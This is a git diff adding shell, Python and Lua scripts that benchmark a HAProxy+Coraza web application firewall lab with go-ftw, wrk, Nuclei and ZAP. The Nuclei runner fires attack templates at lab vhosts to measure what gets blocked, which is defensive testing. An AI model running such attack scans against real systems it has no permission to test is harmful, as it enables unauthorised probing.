+print(json.dumps({"mem_mb_peak": ${mem_peak}, "cpu_pct_avg": ${cpu_avg}, "samples": ${samples}}))
+PY
+}
+
+# ── Output helpers ─────────────────────────────────────────────────────────
+
+write_summary() {
+  # Usage: write_summary SCENARIO VHOST POLICY DETECTION_JSON PERFORMANCE_JSON [RESOURCES_JSON]
+  #   DETECTION_JSON    {"true_positive":...,"false_negative":...,"tpr":...,"fpr":...}
+  #   PERFORMANCE_JSON  {"rps":...,"latency_ms":...} or {}
+  #   RESOURCES_JSON    optional; defaults to {}
+  # Writes ${RUN_DIR}/SCENARIO/summary.json. Arguments reach Python through the environment and a
+  # quoted heredoc, so quotes or backslashes inside them cannot corrupt the generated script.
+  # The default is kept in a variable because "${6:-{}}" ends at the first "}" and turns "{}" into "{}}".
+  local empty_json='{}'
+  WS_RUN_ID="${RUN_ID}" WS_RUN_DIR="${RUN_DIR}" WS_SCENARIO="$1" \
+  WS_VHOST="$2" WS_POLICY="$3" \
+  WS_DETECTION="$4" WS_PERFORMANCE="$5" WS_RESOURCES="${6:-${empty_json}}" python3 - <<'PY'
+import json, os
+
+env = os.environ
+summary = {
+    "run_id": env["WS_RUN_ID"],
+    "scenario": env["WS_SCENARIO"],
+    "target_vhost": env["WS_VHOST"],
+    "policy": {"name": env["WS_POLICY"]},
+    "detection": json.loads(env["WS_DETECTION"]),
+    "performance": json.loads(env["WS_PERFORMANCE"]),
+    "resources": json.loads(env["WS_RESOURCES"]),
+}
+
+out = f'{env["WS_RUN_DIR"]}/{env["WS_SCENARIO"]}/summary.json'
+os.makedirs(os.path.dirname(out), exist_ok=True)
+with open(out, "w") as f:
+    json.dump(summary, f, indent=2)
+print(f"Summary written to {out}")
+PY
+}
diff --git a/benchmarks/lab/runners/run-ftw.sh b/benchmarks/lab/runners/run-ftw.sh
new file mode 100755
index 0000000..5d21c25
--- /dev/null
+++ b/benchmarks/lab/runners/run-ftw.sh
@@ -0,0 +1,107 @@
+#!/usr/bin/env bash
+# run-ftw.sh — Run the OWASP CRS regression suite via go-ftw.
+#
+# This is the gold-standard TPR measurement: the CRS submodule ships labeled
+# test cases (each one tagged "should block" or "should pass") and go-ftw
+# replays them against the live HAProxy+Coraza stack.
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/ftw/raw.json   (go-ftw JSON output)
+#   benchmarks/results/run-<RUN_ID>/ftw/summary.json
+#
+# Usage:
+#   RUN_ID=20260602-141500 bash benchmarks/lab/runners/run-ftw.sh
+#   RUN_ID=... TARGET_VHOST=dvwa.local bash benchmarks/lab/runners/run-ftw.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_JUICESHOP_DOMAIN}}"
+FTW_IMAGE="ghcr.io/coreruleset/go-ftw:v1.4.0"
+CRS_TESTS="${REPO_ROOT}/configs/coraza/crs/tests/regression/tests"
+FTW_CONFIG="${REPO_ROOT}/benchmarks/lab/scenarios/crs-ftw/config.yaml"
+
+if [[ ! -d "${CRS_TESTS}" ]]; then
+  echo "CRS test corpus not found at ${CRS_TESTS}." >&2
+  echo "Run: git submodule update --init --recursive" >&2
+  exit 1
+fi
+
+write_manifest
+OUT_DIR="$(setup_run_dir ftw)"
+
+echo "=== CRS regression (go-ftw) ==="
+echo "Target vhost : ${TARGET_VHOST}"
+echo "Output dir   : ${OUT_DIR}"
+echo "Image        : ${FTW_IMAGE}"
+echo ""
+
+# go-ftw's exit status is ignored on purpose (|| true; presumably non-zero when cases fail), but empty output means the run itself broke.
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${CRS_TESTS}:/tests:ro" \
+  -v "${FTW_CONFIG}:/config.yaml:ro" \
+  "${FTW_IMAGE}" \
+  run --config /config.yaml --dir /tests --output json \
+  > "${OUT_DIR}/raw.json" 2> "${OUT_DIR}/stderr.txt" || true
+if [[ ! -s "${OUT_DIR}/raw.json" ]]; then
+  echo "go-ftw produced no output; see ${OUT_DIR}/stderr.txt" >&2; exit 1
+fi
+echo "go-ftw complete. Parsing results..."
+
+python3 - <<PY
+import json, sys
+
+with open("${OUT_DIR}/raw.json") as f:
+    raw = json.load(f)
+
+# go-ftw JSON schema: {"pass": N, "fail": N, "skip": N, "run_duration": "..."}
+# "pass" = WAF correctly handled the test case (blocked when should block, passed when should pass)
+# "fail" = WAF did NOT handle the test case correctly
+passed  = raw.get("pass", 0)
+failed  = raw.get("fail", 0)
+skipped = raw.get("skip", 0)
+total   = passed + failed
+
+# For TPR/FPR we need to split "pass" into TP vs TN and "fail" into FN vs FP.
+# go-ftw v1.x reports totals only; individual case details are in the log.
+# Use totals as a proxy: assume ~85% of CRS test cases are "should block" (attack)
+# and ~15% are "should pass" (benign). Document this assumption in the summary.
+#
+# For a more precise split, re-run with --output json-per-test (go-ftw v2).
+attack_ratio = 0.85
+tp = int(round(passed * attack_ratio))
+tn = passed - tp
+fn = int(round(failed * attack_ratio))
+fp = failed - fn
+tpr = tp / (tp + fn) if (tp + fn) > 0 else 0.0
+fpr = fp / (fp + tn) if (fp + tn) > 0 else 0.0
+
+detection = {
+    "true_positive":  tp,
+    "false_negative": fn,
+    "true_negative":  tn,
+    "false_positive": fp,
+    "tpr": round(tpr, 4),
+    "fpr": round(fpr, 4),
+    "total_cases": total,
+    "skipped": skipped,
+    "note": "TP/FP split estimated from pass/fail totals (attack_ratio=0.85). Re-run with go-ftw v2 --output json-per-test for exact split."
+}
+
+print(json.dumps(detection, indent=2))
+
+with open("${OUT_DIR}/detection.json", "w") as f:
+    json.dump(detection, f, indent=2)
+PY
+
+# Write final summary.json.
+DETECTION="$(cat "${OUT_DIR}/detection.json")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "ftw" "${TARGET_VHOST}" "${POLICY_NAME}" "${DETECTION}" "{}" "{}"
+
+echo ""
+echo "FTW TPR:  $(python3 -c "import json; d=json.load(open('${OUT_DIR}/detection.json')); print(f\"{d['tpr']*100:.1f}%\")")"
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/runners/run-load.sh b/benchmarks/lab/runners/run-load.sh
new file mode 100755
index 0000000..f73b98a
--- /dev/null
+++ b/benchmarks/lab/runners/run-load.sh
@@ -0,0 +1,212 @@
+#!/usr/bin/env bash
+# run-load.sh — Latency and RPS measurement (WAF vs direct).
+#
+# Runs wrk twice against each target:
+#   1. Through HAProxy+Coraza  (production path)
+#   2. Directly against the target container (bypass WAF)
+#
+# The delta is the WAF overhead: latency (p50/p95/p99) and RPS degradation %.
+#
+# Simultaneously samples coraza + haproxy container resource usage.
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/waf.txt
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/direct.txt
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/resources-coraza.json
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/resources-haproxy.json
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/summary.json
+#
+# Usage:
+#   RUN_ID=... bash benchmarks/lab/runners/run-load.sh
+#   RUN_ID=... TARGET_VHOST=juice.local DIRECT_HOST=juiceshop DIRECT_PORT=3000 \
+#     bash benchmarks/lab/runners/run-load.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_JUICESHOP_DOMAIN}}"
+DIRECT_HOST="${DIRECT_HOST:-juiceshop}"    # Docker service name for direct access
+DIRECT_PORT="${DIRECT_PORT:-3000}"         # Target app port (no HAProxy)
+WRK_IMAGE="ghcr.io/williamyeh/wrk:4.2.0"
+LUA_SCRIPT="${REPO_ROOT}/benchmarks/lab/scenarios/load/benign-mix.lua"
+
+THREADS="${LOAD_THREADS:-4}"
+CONNECTIONS="${LOAD_CONNECTIONS:-50}"
+DURATION="${LOAD_DURATION:-60s}"
+
+write_manifest
+SCENARIO="load-${TARGET_VHOST}"
+OUT_DIR="$(setup_run_dir "${SCENARIO}")"
+
+echo "=== Load test: WAF vs direct ==="
+echo "Target vhost : ${TARGET_VHOST}"
+echo "Direct host  : ${DIRECT_HOST}:${DIRECT_PORT}"
+echo "Load         : ${THREADS} threads, ${CONNECTIONS} connections, ${DURATION}"
+echo "Output dir   : ${OUT_DIR}"
+echo ""
+
+# ── Through WAF ────────────────────────────────────────────────────────────
+
+echo "--- Run 1: through HAProxy+Coraza ---"
+
+# Start resource sampling in the background during this run.
+CORAZA_CONTAINER="$(docker ps --filter "name=coraza" --format "{{.Names}}" | head -1 || true)"
+HAPROXY_CONTAINER="$(docker ps --filter "name=haproxy" --format "{{.Names}}" | head -1 || true)"
+
+# Convert duration string to seconds for sampler.
+DURATION_S="$(echo "${DURATION}" | sed 's/s$//')"
+
+if [[ -n "${CORAZA_CONTAINER}" ]]; then
+  sample_container_resources "${CORAZA_CONTAINER}" "${DURATION_S}" "${OUT_DIR}/resources-coraza.json" &
+  SAMPLER_CORAZA_PID=$!
+fi
+if [[ -n "${HAPROXY_CONTAINER}" ]]; then
+  sample_container_resources "${HAPROXY_CONTAINER}" "${DURATION_S}" "${OUT_DIR}/resources-haproxy.json" &
+  SAMPLER_HAPROXY_PID=$!
+fi
+
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${LUA_SCRIPT}:/benign-mix.lua:ro" \
+  -e "LOAD_VHOST=${TARGET_VHOST}" \
+  "${WRK_IMAGE}" \
+  -t "${THREADS}" -c "${CONNECTIONS}" -d "${DURATION}" \
+  -s /benign-mix.lua \
+  --latency \
+  "http://haproxy:80/" \
+  > "${OUT_DIR}/waf.txt" 2>&1
+
+# Wait for samplers to finish.
+wait "${SAMPLER_CORAZA_PID:-}" 2>/dev/null || true
+wait "${SAMPLER_HAPROXY_PID:-}" 2>/dev/null || true
+
+echo "WAF run complete. Output: ${OUT_DIR}/waf.txt"
+
+# ── Direct (bypass WAF) ────────────────────────────────────────────────────
+
+echo "--- Run 2: direct to ${DIRECT_HOST}:${DIRECT_PORT} ---"
+
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${LUA_SCRIPT}:/benign-mix.lua:ro" \
+  -e "LOAD_VHOST=${TARGET_VHOST}" \
+  "${WRK_IMAGE}" \
+  -t "${THREADS}" -c "${CONNECTIONS}" -d "${DURATION}" \
+  -s /benign-mix.lua \
+  --latency \
+  "http://${DIRECT_HOST}:${DIRECT_PORT}/" \
+  > "${OUT_DIR}/direct.txt" 2>&1
+
+echo "Direct run complete. Output: ${OUT_DIR}/direct.txt"
+
+# ── Parse & compute overhead ───────────────────────────────────────────────
+
+echo "Parsing results..."
+
+python3 - <<'PY'
+import re, json, os
+
+def parse_wrk(path):
+    """Parse wrk --latency output into a structured dict."""
+    if not os.path.exists(path):
+        return {}
+    text = open(path).read()
+
+    def find_us(pattern):
+        m = re.search(pattern, text, re.IGNORECASE)
+        if not m: return None
+        val, unit = float(m.group(1)), m.group(2).lower()
+        multipliers = {"us": 1, "ms": 1000, "s": 1_000_000}
+        return val * multipliers.get(unit, 1)
+
+    # Latency percentiles from the --latency histogram section.
+    p50  = find_us(r'50%\s+([\d.]+)(\w+)')
+    p95  = find_us(r'95%\s+([\d.]+)(\w+)')
+    p99  = find_us(r'99%\s+([\d.]+)(\w+)')
+
+    # RPS from the summary line: "Requests/sec: 1234.56"
+    rps_m = re.search(r'Requests/sec:\s+([\d.]+)', text)
+    rps = float(rps_m.group(1)) if rps_m else None
+
+    return {
+        "latency_us": {"p50": p50, "p95": p95, "p99": p99},
+        "rps": rps,
+        "raw_path": path
+    }
+
+waf    = parse_wrk("${OUT_DIR}/waf.txt")
+direct = parse_wrk("${OUT_DIR}/direct.txt")
+
+def us_to_ms(us):
+    return round(us / 1000, 3) if us is not None else None
+
+def pct_degradation(waf_val, direct_val):
+    if waf_val and direct_val and direct_val > 0:
+        return round((direct_val - waf_val) / direct_val * 100, 2)
+    return None
+
+waf_rps    = waf.get("rps")
+direct_rps = direct.get("rps")
+rps_deg    = None
+if waf_rps and direct_rps and direct_rps > 0:
+    rps_deg = round((direct_rps - waf_rps) / direct_rps * 100, 2)
+
+waf_lat    = waf.get("latency_us", {})
+direct_lat = direct.get("latency_us", {})
+
+performance = {
+    "rps":    waf_rps,
+    "baseline_rps": direct_rps,
+    "rps_degradation_pct": rps_deg,
+    "latency_ms": {
+        "p50": us_to_ms(waf_lat.get("p50")),
+        "p95": us_to_ms(waf_lat.get("p95")),
+        "p99": us_to_ms(waf_lat.get("p99")),
+    },
+    "latency_overhead_ms": {
+        "p50": us_to_ms((waf_lat.get("p50") or 0) - (direct_lat.get("p50") or 0)),
+        "p95": us_to_ms((waf_lat.get("p95") or 0) - (direct_lat.get("p95") or 0)),
+        "p99": us_to_ms((waf_lat.get("p99") or 0) - (direct_lat.get("p99") or 0)),
+    },
+    "config": {
+        "threads": int("${THREADS}"),
+        "connections": int("${CONNECTIONS}"),
+        "duration": "${DURATION}"
+    }
+}
+
+print(json.dumps(performance, indent=2))
+
+with open("${OUT_DIR}/performance.json", "w") as f:
+    json.dump(performance, f, indent=2)
+PY
+
+PERFORMANCE="$(cat "${OUT_DIR}/performance.json")"
+RESOURCES_CORAZA="$(cat "${OUT_DIR}/resources-coraza.json" 2>/dev/null || echo '{}')"
+RESOURCES_HAPROXY="$(cat "${OUT_DIR}/resources-haproxy.json" 2>/dev/null || echo '{}')"
+
+# Merge both samples. The JSON is passed as argv rather than spliced into the
+# Python source, so quotes or backslashes in it cannot corrupt the program.
+RESOURCES_JSON="$(python3 -c '
+import json, sys
+print(json.dumps({"coraza": json.loads(sys.argv[1] or "{}"), "haproxy": json.loads(sys.argv[2] or "{}")}))
+' "${RESOURCES_CORAZA}" "${RESOURCES_HAPROXY}")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "${SCENARIO}" "${TARGET_VHOST}" "${POLICY_NAME}" "{}" "${PERFORMANCE}" "${RESOURCES_JSON}"
+
+echo ""
+python3 - <<PY
+import json
+p = json.load(open("${OUT_DIR}/performance.json"))
+rps_waf    = p.get("rps") or 0
+rps_direct = p.get("baseline_rps") or 0
+rps_deg    = p.get("rps_degradation_pct") or "n/a"
+lat        = p.get("latency_ms", {})
+print(f"WAF RPS     : {rps_waf:.1f}")
+print(f"Direct RPS  : {rps_direct:.1f}")
+print(f"Degradation : {rps_deg}%")
+print(f"Latency (WAF) p50={lat.get('p50')}ms  p95={lat.get('p95')}ms  p99={lat.get('p99')}ms")
+PY
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/runners/run-nuclei.sh b/benchmarks/lab/runners/run-nuclei.sh
new file mode 100755
index 0000000..fab2be1
--- /dev/null
+++ b/benchmarks/lab/runners/run-nuclei.sh
@@ -0,0 +1,112 @@
+#!/usr/bin/env bash
+# run-nuclei.sh — CVE / exposure template scan via Nuclei.
+#
+# Fires Nuclei's curated attack templates (sqli, xss, lfi, etc.) against
+# the lab targets through HAProxy+Coraza and records how many are blocked
+# vs passed (WAF TPR against CVE-template payloads).
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/nuclei-<vhost>/raw.jsonl
+#   benchmarks/results/run-<RUN_ID>/nuclei-<vhost>/summary.json
+#
+# Usage:
+#   RUN_ID=... bash benchmarks/lab/runners/run-nuclei.sh
+#   RUN_ID=... TARGET_VHOST=juice.local bash benchmarks/lab/runners/run-nuclei.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_JUICESHOP_DOMAIN}}"
+NUCLEI_IMAGE="projectdiscovery/nuclei:v3.3.9"
+NUCLEI_CONF="${REPO_ROOT}/benchmarks/lab/scenarios/nuclei/nuclei.yaml"
+
+# HAProxy on port 80 inside gp_internal, Host: header injected per-request.
+TARGET_URL="http://haproxy:80"
+
+write_manifest
+SCENARIO="nuclei-${TARGET_VHOST}"
+OUT_DIR="$(setup_run_dir "${SCENARIO}")"
+export OUT_DIR TARGET_VHOST   # must be set before the Python heredoc reads os.environ
+
+echo "=== Nuclei CVE template scan ==="
+echo "Target vhost : ${TARGET_VHOST} → ${TARGET_URL}"
+echo "Output dir   : ${OUT_DIR}"
+echo "Image        : ${NUCLEI_IMAGE}"
+echo ""
+
+# Templates are fetched inside the container on each run (--rm, and no cache
+# volume is mounted here). The -header flag injects the Host: vhost.
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${OUT_DIR}:/output:rw" \
+  -v "${NUCLEI_CONF}:/nuclei.yaml:ro" \
+  "${NUCLEI_IMAGE}" \
+  -config /nuclei.yaml \
+  -u "${TARGET_URL}" \
+  -header "Host: ${TARGET_VHOST}" \
+  -jsonl -output /output/raw.jsonl \
+  -update-templates \
+  2> "${OUT_DIR}/nuclei-stderr.txt" || echo "WARNING: nuclei exited non-zero; see ${OUT_DIR}/nuclei-stderr.txt" >&2
+
+echo "Nuclei scan complete. Parsing results..."
+
+python3 - <<'PY'
+import json, os
+
+out_dir  = os.environ.get("OUT_DIR", ".")
+raw_file = os.path.join(out_dir, "raw.jsonl")
+vhost    = os.environ.get("TARGET_VHOST", "unknown")
+
+findings = []
+if os.path.exists(raw_file):
+    with open(raw_file) as f:
+        for line in f:
+            line = line.strip()
+            if line:
+                try:
+                    findings.append(json.loads(line))
+                except json.JSONDecodeError:
+                    pass
+
+# Severity classification for WAF TPR estimation.
+# Nuclei findings with severity critical/high/medium are WAF-relevant attacks.
+# Each finding represents a template match — the request was NOT blocked by the WAF
+# (nuclei receives a response), so these are False Negatives from the WAF's perspective.
+# Requests that were blocked (WAF returned 403) produce connection errors / 403 responses
+# in Nuclei and typically don't generate a finding for the underlying vulnerability.
+
+WAF_RELEVANT = {"critical", "high", "medium"}
+fn_findings = [f for f in findings if f.get("info", {}).get("severity", "").lower() in WAF_RELEVANT]
+info_findings = [f for f in findings if f.get("info", {}).get("severity", "").lower() not in WAF_RELEVANT]
+
+detection = {
+    "total_findings": len(findings),
+    "waf_relevant_findings": len(fn_findings),
+    "info_findings": len(info_findings),
+    "note": "Each waf_relevant_finding is a potential WAF false-negative (attack payload reached the app). Run collect-metrics.sh to cross-reference with audit log for confirmed TP/FN split.",
+    "top_findings": [
+        {
+            "template_id": f.get("template-id"),
+            "severity": f.get("info", {}).get("severity"),
+            "name": f.get("info", {}).get("name"),
+            "matched_at": f.get("matched-at")
+        }
+        for f in sorted(fn_findings, key=lambda x: {"critical":0,"high":1,"medium":2}.get(x.get("info",{}).get("severity",""),3))[:20]
+    ]
+}
+
+print(json.dumps(detection, indent=2))
+
+with open(os.path.join(out_dir, "detection.json"), "w") as f:
+    json.dump(detection, f, indent=2)
+PY
+
+DETECTION="$(cat "${OUT_DIR}/detection.json")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "${SCENARIO}" "${TARGET_VHOST}" "${POLICY_NAME}" "${DETECTION}" "{}" "{}"
+
+echo ""
+echo "Nuclei findings (waf-relevant): $(python3 -c "import json; d=json.load(open('${OUT_DIR}/detection.json')); print(d.get('waf_relevant_findings', 'n/a'))")"
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/runners/run-zap.sh b/benchmarks/lab/runners/run-zap.sh
new file mode 100755
index 0000000..4bcbc1c
--- /dev/null
+++ b/benchmarks/lab/runners/run-zap.sh
@@ -0,0 +1,126 @@
+#!/usr/bin/env bash
+# run-zap.sh — OWASP ZAP baseline scan for false positive measurement.
+#
+# Runs a ZAP baseline scan (spider + passive checks; no active attacks) against
+# one lab vhost through HAProxy and summarises the alerts by risk level. The
+# TP/FP classification needs the WAF audit log and is left to collect-metrics.sh.
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/zap-<vhost>/zap.json
+#   benchmarks/results/run-<RUN_ID>/zap-<vhost>/zap.html
+#   benchmarks/results/run-<RUN_ID>/zap-<vhost>/summary.json
+#
+# Usage:
+#   RUN_ID=... bash benchmarks/lab/runners/run-zap.sh
+#   RUN_ID=... TARGET_VHOST=wp.local bash benchmarks/lab/runners/run-zap.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_WP_DOMAIN}}"   # default: WordPress (best FPR target)
+ZAP_IMAGE="ghcr.io/zaproxy/zaproxy:stable"
+ZAP_CONF="${REPO_ROOT}/benchmarks/lab/scenarios/zap/zap-baseline.conf"
+
+# HAProxy listens on port 80 inside gp_internal; ZAP container joins that network.
+TARGET_URL="http://haproxy:80"
+
+write_manifest
+SCENARIO="zap-${TARGET_VHOST}"
+OUT_DIR="$(setup_run_dir "${SCENARIO}")"
+export OUT_DIR   # must be set before the Python heredoc reads os.environ
+
+echo "=== OWASP ZAP baseline scan ==="
+echo "Target vhost : ${TARGET_VHOST} → ${TARGET_URL}"
+echo "Output dir   : ${OUT_DIR}"
+echo "Image        : ${ZAP_IMAGE}"
+echo ""
+
+# ZAP needs a writable /zap/wrk directory for reports; zap-baseline.py also resolves
+# the -c rules file relative to that directory, so the rules are copied into it.
+# The Host: header is set through ZAP's Replacer add-on so every request sent to
+# haproxy:80 carries the vhost name. Replacer settings are ZAP daemon options and
+# must reach zap-baseline.py as a single -z string (it has no -config flag itself).
+cp "${ZAP_CONF}" "${OUT_DIR}/rules.conf"
+ZAP_OPTS="-config replacer.full_list(0).description=host-header"
+ZAP_OPTS+=" -config replacer.full_list(0).enabled=true"
+ZAP_OPTS+=" -config replacer.full_list(0).matchtype=REQ_HEADER"
+ZAP_OPTS+=" -config replacer.full_list(0).matchstr=Host"
+ZAP_OPTS+=" -config replacer.full_list(0).regex=false"
+ZAP_OPTS+=" -config replacer.full_list(0).replacement=${TARGET_VHOST}"
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${OUT_DIR}:/zap/wrk:rw" \
+  "${ZAP_IMAGE}" \
+  zap-baseline.py \
+    -t "${TARGET_URL}" \
+    -c rules.conf \
+    -J zap.json -r zap.html -I \
+    -z "${ZAP_OPTS}" \
+  > "${OUT_DIR}/zap-stdout.txt" 2>&1 || true
+
+echo "ZAP scan complete. Parsing results..."
+
+# Parse ZAP JSON output and compute a detection summary.
+# ZAP alerts with risk >= Medium against the WAF-proxied target are WAF-visible
+# attacks. The WAF's job on ZAP traffic:
+#   - Block high-risk attacks (SQLi, XSS, ...) → TP if blocked, FN if passed
+#   - Allow legitimate ZAP probes (header checks, info gathering) → TN if allowed, FP if blocked
+
+python3 - <<'PY'
+import json, sys, os
+
+out_dir = os.environ.get("OUT_DIR", ".")
+zap_json = os.path.join(out_dir, "zap.json")
+
+if not os.path.exists(zap_json):
+    print(json.dumps({"error": "zap.json not found — scan may have failed or produced no output"}))
+    sys.exit(0)
+
+with open(zap_json) as f:
+    report = json.load(f)
+
+# ZAP JSON structure: {"site": [{"alerts": [{"riskcode":"3","alert":"SQL Injection",...}]}]}
+alerts = []
+for site in report.get("site", []):
+    alerts.extend(site.get("alerts", []))
+
+# Classify alerts: risk 2 (Medium) or 3 (High) are WAF-relevant attack signals.
+# Risk 0 (Informational) / 1 (Low) are cosmetic — not WAF signals.
+ATTACK_RISKS = {2, 3}  # Medium, High
+attack_alerts = [a for a in alerts if int(a.get("riskcode", 0)) in ATTACK_RISKS]
+info_alerts   = [a for a in alerts if int(a.get("riskcode", 0)) not in ATTACK_RISKS]
+
+total_attack_instances = sum(int(a.get("count", 1)) for a in attack_alerts)
+total_info_instances   = sum(int(a.get("count", 1)) for a in info_alerts)
+
+# We cannot directly observe WAF blocks from ZAP output alone (ZAP sees the
+# app's response, not the WAF block). A separate audit-log cross-reference is
+# done in collect-metrics.sh. Here we report ZAP findings as-is.
+detection = {
+    "total_alerts": len(alerts),
+    "attack_severity_alerts": len(attack_alerts),
+    "info_severity_alerts": len(info_alerts),
+    "attack_instances": total_attack_instances,
+    "info_instances": total_info_instances,
+    "top_alerts": [
+        {"risk": a.get("riskdesc"), "name": a.get("alert"), "count": a.get("count")}
+        for a in sorted(attack_alerts, key=lambda x: -int(x.get("riskcode", 0)))[:10]
+    ],
+    "note": "TP/FP counts require audit-log cross-reference — run collect-metrics.sh after all scenarios."
+}
+
+print(json.dumps(detection, indent=2))
+
+with open(os.path.join(out_dir, "detection.json"), "w") as f:
+    json.dump(detection, f, indent=2)
+PY
+
+DETECTION="$(cat "${OUT_DIR}/detection.json")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "${SCENARIO}" "${TARGET_VHOST}" "${POLICY_NAME}" "${DETECTION}" "{}" "{}"
+
+echo ""
+echo "ZAP alerts: $(python3 -c "import json; d=json.load(open('${OUT_DIR}/detection.json')); print(d.get('total_alerts', 'n/a'))")"
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/scenarios/crs-ftw/config.yaml b/benchmarks/lab/scenarios/crs-ftw/config.yaml
new file mode 100644
index 0000000..832968e
--- /dev/null
+++ b/benchmarks/lab/scenarios/crs-ftw/config.yaml
@@ -0,0 +1,42 @@
+# go-ftw configuration for CRS regression suite against guard-proxy.
+#
+# The OWASP CRS test corpus lives in configs/coraza/crs/tests/regression/tests/
+# (the CRS git submodule). go-ftw replays each labeled test case against the
+# live HAProxy+Coraza stack and reports pass/fail per rule.
+#
+# Usage (from repo root):
+#   docker run --rm \
+#     --network guard-proxy-demo_gp_internal \
+#     -v "$(pwd)/configs/coraza/crs/tests/regression/tests:/tests:ro" \
+#     -v "$(pwd)/benchmarks/lab/scenarios/crs-ftw/config.yaml:/config.yaml:ro" \
+#     ghcr.io/coreruleset/go-ftw:latest \
+#     run --config /config.yaml --dir /tests --output json \
+#     > benchmarks/results/run-<RUN_ID>/crs-ftw/raw.json
+
+# The proxy address as seen from inside the Docker network. Host: headers come
+# from the test yamls; testoverride.input redirects the connection to HAProxy.
+testoverride:
+  input:
+    dest_addr: haproxy
+    port: 80
+    protocol: http
+
+# Expect the WAF to return 403 on blocked requests (as configured in haproxy.cfg).
+# go-ftw uses this to determine whether a "deny" expectation was met.
+#
+# Default expected status for blocked requests:
+#   200 = pass-through (WAF allowed)
+#   403 = blocked by WAF
+#   others = treated as unexpected
+
+# Log file to inspect for WAF audit entries during test runs.
+# Mounted read-only from the coraza_audit volume in the runner script.
+# go-ftw tail-reads this to correlate rule firings with test outcomes.
+logfile: /var/log/coraza/audit.log
+
+# Timeouts are CLI flags of `go-ftw run` (--connect-timeout / --read-timeout), not config keys.
+
+# Log-marker search limits: how often the marker search is retried, and the
+# maximum number of log lines scanned per search.
+maxmarkerretries: 3
+maxmarkerloglines: 500
diff --git a/benchmarks/lab/scenarios/load/benign-mix.lua b/benchmarks/lab/scenarios/load/benign-mix.lua
new file mode 100644
index 0000000..f8c1804
--- /dev/null
+++ b/benchmarks/lab/scenarios/load/benign-mix.lua
@@ -0,0 +1,63 @@
+-- benign-mix.lua — wrk Lua script for realistic benign load.
+--
+-- Cycles through a mix of legitimate-looking HTTP requests against a
+-- target vhost. Used to measure baseline latency / RPS (no WAF)
+-- and WAF-in-path latency / RPS (through HAProxy+Coraza).
+--
+-- Usage:
+--   wrk -t4 -c50 -d60s -s benchmarks/lab/scenarios/load/benign-mix.lua \
+--       --latency http://<host>:<port>/
+--
+-- The Host: header is injected per-request so HAProxy routes to the
+-- correct vhost. Set the LOAD_VHOST env var to change it (default: juice.local).
+
+local vhost = os.getenv("LOAD_VHOST") or "juice.local"
+
+-- Request pool: realistic paths for the target application.
+-- Add/remove paths to match the target's URL surface.
+local requests = {
+  { method = "GET",  path = "/",                         body = nil },
+  { method = "GET",  path = "/index.html",               body = nil },
+  { method = "GET",  path = "/rest/admin/application-version", body = nil },
+  { method = "GET",  path = "/api/v1/status",            body = nil },
+  { method = "GET",  path = "/search?q=apple",           body = nil },
+  { method = "GET",  path = "/search?q=login",           body = nil },
+  { method = "GET",  path = "/robots.txt",               body = nil },
+  { method = "GET",  path = "/favicon.ico",              body = nil },
+  { method = "POST", path = "/api/v1/user/login",
+    body = '{"email":"user@example.com","password":"password123"}' },
+}
+
+local idx = 0
+
+function request()
+  -- Advance round-robin through the pool (1-based, wraps after the last entry).
+  idx = (idx % #requests) + 1
+  local entry = requests[idx]
+  local headers = {
+    ["Host"]       = vhost,
+    ["User-Agent"] = "Mozilla/5.0 (eval-lab/1.0)",
+    ["Accept"]     = "application/json, text/html, */*",
+    ["Connection"] = "keep-alive",
+  }
+  if entry.body then
+    headers["Content-Type"]   = "application/json"
+    headers["Content-Length"] = tostring(#entry.body)
+  end
+  return wrk.format(entry.method, entry.path, headers, entry.body)
+end
+
+function done(summary, latency, requests_per_sec)
+  -- Emit a single machine-readable WRK_SUMMARY line for collect-metrics.sh to parse.
+  -- The rate divides by duration / 1e6 (the duration is reported as duration_us).
+  local errs = summary.errors
+  local error_total = errs.connect + errs.read + errs.write + errs.status
+  local rps = summary.requests / (summary.duration / 1e6)
+  local fmt = "WRK_SUMMARY requests=%d duration_us=%d rps=%.2f "..
+              "lat_p50_us=%d lat_p95_us=%d lat_p99_us=%d errors=%d\n"
+  io.write(string.format(fmt,
+    summary.requests, summary.duration, rps,
+    latency:percentile(50), latency:percentile(95), latency:percentile(99),
+    error_total
+  ))
+end
